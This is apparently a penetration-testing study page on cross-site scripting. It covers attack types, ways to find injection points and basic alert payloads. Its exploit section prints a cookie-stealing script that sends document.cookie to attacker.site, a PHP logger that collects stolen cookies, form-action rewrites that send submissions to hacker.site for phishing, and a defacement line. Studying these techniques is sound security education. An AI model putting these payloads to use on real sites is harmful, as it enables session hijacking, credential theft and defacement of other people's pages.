Cross-site Scripting

Introduction

XSS happens when the user input is given as output without sanitization on input and output.

Goals of XSS:

  1. Cookie stealing

  2. Complete control on browser

  3. Initiating an exploitation phase against browser plugins first and and the machine

  4. Keylogging

3 types:

  1. Reflected (Server side code is vulnerable)

  2. Stored

  3. DOM (Client side code is vulnerable)

Reflected XSS

Victims bring the payload in the HTTP request to the vulnerable website. Then the browser renders the payload in the victim's context.

Persistent XSS

Persistent XSS is able to deface a webpage.

This type of attack does not need the victims to click on any links. It happens when a victim browses a vulnerable page injected with persistent XSS code.

DOM-based XSS

Make use of the HTML tree.

Find XSS

Input could be:

  1. GET/POST variables

  2. COOKIE

  3. HTTP HEADERS

First, try to inject <plaintext> tag to see if the page will be broken after.

Then, check if we can inject script using <script> or using one of the DOM events (e.g. <h1>).

When inspecting the source code, look for all the points where the application outputs data (totally / partially) supplied by the user without sanitization and tracking it back to the source where it is retrieved for the first time.

XSS tricks

Simple: <script>alert('xss')</script> IMG tag onload: <img src="xxx" onload="javascript:alert('xss')"> <img src="xxx" onload="alert('xss')"> <img src="xxx" onload="alert(String.fromCharCode(88,83,83))">

XSS Exploit

Cookie Stealing

  1. Find injection point

  2. Read the cookie using JS

  3. Redirect the cookie to attacker server

  4. Retrieve and install the stolen cookie on browser

Example:

<script>
var i = new Image(); 
i.src="http://attacker.site/steal.php?q="%2bdocument.cookie;
</script>

Note %2b = +

The steal.php could be:

$fn = "log.txt";
$fh = fopen($fn, 'a');
$cookie = $_GET['q'];
fwrite($fh, $cookie);
fclose($fh)

We can also do some other thing, for example, change form action location:

document.forms[0].action="http://attacker.site/steal.php";

Web Defacement

  • Make use of Persistent XSS

  • Change the appearance of the web by manipulating the DOM

document.body.innerHTML="<h1>You Asshole!</h1>";

Phishing

  • By modifying the form action's destination

document.forms[0].action="https://hacker.site/thanks.php";

BeEF

XSS Evasion

PreviousScanningNextSQL Injection

Last updated